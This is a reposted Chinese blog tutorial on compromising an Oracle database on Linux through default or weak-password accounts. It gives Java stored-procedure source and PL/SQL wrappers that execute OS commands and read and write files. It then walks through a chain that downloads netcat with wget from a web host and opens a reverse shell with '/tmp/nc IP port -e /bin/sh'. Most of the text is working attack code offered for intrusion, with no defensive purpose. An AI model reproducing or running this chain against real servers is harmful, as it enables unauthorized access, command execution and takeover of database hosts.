[转]Linux下Oracle获取shell

很多时候对于开放1521端口的Windows下Oracle数据库服务器，因为大多存在默认低权限用户dbsnmp，或者人品爆发高权限的用户 (sysdba)是默认密码或弱口令，由此可以通过Oracle的一些提权漏洞获取Oracle的最高权限，直至得到系统的SYSTEM权限。

而 对于Linux下的Oracle数据库入侵，因为Linux下一般Oracle数据库都是以Oracle的独立用户在跑，所以无法获取到root权限。当 然很多WEB和数据库在同一服务器上的时候，可以导出WEBSHELL到WEB目录来获取权限。然而大部分的数据库都是独立跑在一个服务器上，以下用简单 的方式获取Oracle的shell，即采用nc反弹的shell的方式。

1、Oracle数据库支持JAVA（如Windows下入侵一般）

2、通过Oracle客户端sqlplus，以sysdba用户登录（dbsnmp用户可提权至sysdba）

3、执行以下代码：
CODE_1:

java

1. create or replace and resolve java source named "oraexec" as   
2. import java.lang.*;   
3. import java.io.*;   
4. public class oraexec   
5. {   
6. /*   
7. * Command execution module   
8. */   
9. public static void execCommand(String command) throws IOException   
10. {   
11. Runtime.getRuntime().exec(command);   
12. }   
13.   
14. /*   
15. * File reading module   
16. */   
17. public static void readFile(String filename) throws IOException   
18. {   
19. FileReader f = new FileReader(filename);   
20. BufferedReader fr = new BufferedReader(f);   
21. String text = fr.readLine();   
22. while (text != null) {   
23. System.out.println(text);   
24. text = fr.readLine();   
25. }   
26. fr.close();   
27. }   
28.   
29. /*   
30. * File writing module   
31. */   
32. public static void writeFile(String filename, String line) throws IOException   
33. {   
34. FileWriter f = new FileWriter(filename, true); /* append */   
35. BufferedWriter fw = new BufferedWriter(f);   
36. fw.write(line);   
37. fw.write("\n");   
38. fw.close();   
39. }   
40. }  

============================================

CODE_2:

-- usage: exec javacmd('command');create or replace procedure javacmd(p_command varchar2) aslanguage javaname 'oraexec.execCommand(java.lang.String)';

===========================================

CODE_3:

-- usage: exec dbms_java.set_output(2000);--        set serveroutput on;--        exec javareadfile('/path/to/file');create or replace procedure javareadfile(p_filename in varchar2) aslanguage javaname 'oraexec.readFile(java.lang.String)';

============================================

CODE_4:

-- usage: exec javawritefile('/path/to/file', 'line to append');create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) aslanguage javaname 'oraexec.writeFile(java.lang.String, java.lang.String)';

4、

exec javawritefile('/tmp/getnc', 'wget http://www/nc -O /tmp/nc');  //写入wget nc 命令到文件getnc

exec dbms_java.set_output(2000);   //设置javareadfile

set serveroutput on;

exec javareadfile('/tmp/getnc');  //读取文件查看是否写入成功

exec javacmd('/bin/sh /tmp/getnc'); //执行命令下载nc

exec javareadfile('/tmp/nc');   //查看nc是否下载成功

exec javawritefile('/tmp/shell', '/tmp/nc IP port -e /bin/sh'); //写入反弹命令

exec javareadfile('/tmp/shell');  //读取文件查看是否写入成功

exec javacmd('/bin/sh /tmp/shell'); //执行nc反弹shell，在本地nc监听就能得到shell，如果不行，请确认防火墙

---------------------
作者：小宝哥哥
来源：CNBLOGS
原文：https://www.cnblogs.com/baogg/articles/1991108.html
版权声明：本文为作者原创文章，转载请附上博文链接！